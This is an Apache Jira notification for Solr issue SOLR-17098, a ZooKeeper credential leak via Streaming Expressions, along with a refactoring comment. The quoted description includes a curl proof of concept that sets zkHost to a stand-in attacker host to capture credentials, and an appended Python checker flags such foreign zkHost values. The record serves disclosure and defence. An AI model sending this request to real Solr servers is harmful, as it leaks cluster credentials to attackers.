[
https://issues.apache.org/jira/browse/SOLR-17098?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18081006#comment-18081006
]
David Smiley commented on SOLR-17098:
-------------------------------------
I'm not a fan of this SolrClientCache.setDefaultZKHost(..) method. For one, I
don't love _any_ ZK reference in this module (mostly going away in SOLR-18130).
For two, I don't like that it modifies the configuration post-construction.
For three... the details of how it works are quirky; it'd *really* clean things
up in its absence within SolrClientCache. At the moment I'm looking at
SolrClientCache as a code reviewer of SOLR-18130
[PR|https://github.com/apache/solr/pull/4320]. I could imagine a method like
{{put(CloudSolrClient.CloudSolrClientConnection, CloudSolrClient client)}} and
we call this in ZkController which has a CloudSolrClient with our
zkStateReader. IMO this is much more elegant (and wasn't an option in 2024).
It'll lead to connection re-use too. WDYT?
> Zookeeper Credential Information Disclosure bug via Streaming Expressions
> -------------------------------------------------------------------------
>
> Key: SOLR-17098
> URL: https://issues.apache.org/jira/browse/SOLR-17098
> Project: Solr
> Issue Type: Bug
> Components: streaming expressions
> Reporter: Houston Putman
> Assignee: Houston Putman
> Priority: Blocker
> Fix For: 8.11.3, 9.4.1
>
> Attachments: SOLR-17098-1.diff, SOLR-17098.diff
>
>
> Security list thread:
> [https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh]
>
> ZK Credentials and ACLs can be exposed to any endpoint when the Streaming
> Handler is used:
>
> {code}
> curl --data-urlencode 'expr=search(collection1,
>     zkHost="target:2121",
>     qt="/export",
>     q="*:*",
>     fl="id,a_s,a_i,a_f",
>     sort="a_f asc, a_i asc")' http://localhost:8983/solr/demo/stream
> {code}
>
> In the command above, if the Solr instance has any Zookeeper Credentials or
> ACLs provided, then that information will be sent to the "target:2121"
> address. An attacker could set up a mock Zookeeper service to obtain the
> credentials, and then gain access to Solr's Zookeeper nodes.
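As an added example that is not part of this thread or of Solr's own code: a request-body check that pulls every zkHost argument out of a streaming expression and flags any that points outside the cluster's own ZooKeeper ensemble, which is the condition the credential leak described above depends on. The configured ensemble string and the sample request bodies are constructed here, not taken from the issue.

```python
import re
from urllib.parse import parse_qs, urlencode

# Constructed configured ensemble (host:port list plus chroot), not from the page.
CONFIGURED_ZK_HOST = "zk1:2181,zk2:2181/solr"

# zkHost=<value> inside a streaming expression; the value may be quoted or bare.
ZKHOST_RE = re.compile(r'\bzkHost\s*=\s*(?:"([^"]*)"|([^,()\s"]+))')

# Constructed request bodies in the shape of the curl call from the issue
# (application/x-www-form-urlencoded with an 'expr' parameter).
SAMPLE_BODIES = [
    urlencode({"expr": 'search(collection1, zkHost="target:2121", qt="/export", '
                       'q="*:*", fl="id,a_s,a_i,a_f", sort="a_f asc, a_i asc")'}),
    urlencode({"expr": 'search(collection1, qt="/export", q="*:*", fl="id", sort="a_f asc")'}),
    urlencode({"expr": 'top(n=3, search(collection1, zkHost=zk1:2181/solr, q="*:*", fl="id"))'}),
]


def ensemble_servers(zk_host: str) -> frozenset:
    """Return the host:port servers of a ZK connect string, ignoring any chroot."""
    servers, _, _chroot = zk_host.partition("/")
    return frozenset(s.strip() for s in servers.split(",") if s.strip())


def extract_zk_hosts(expr: str) -> list:
    """Every zkHost argument in the expression, including nested sub-expressions."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in ZKHOST_RE.finditer(expr)]


def check_request_body(body: str, configured_zk_host: str) -> dict:
    """Flag zkHost values whose servers are not all part of the configured ensemble."""
    allowed = ensemble_servers(configured_zk_host)
    zk_hosts, foreign = [], []
    for expr in parse_qs(body).get("expr", []):
        for host in extract_zk_hosts(expr):
            zk_hosts.append(host)
            servers = ensemble_servers(host)
            if not servers or not servers <= allowed:
                foreign.append(host)
    return {"zk_hosts": zk_hosts, "foreign": foreign, "suspicious": bool(foreign)}


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(check_request_body(body, CONFIGURED_ZK_HOST))
```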
--
This message was sent by Atlassian Jira
(v8.20.10#820010)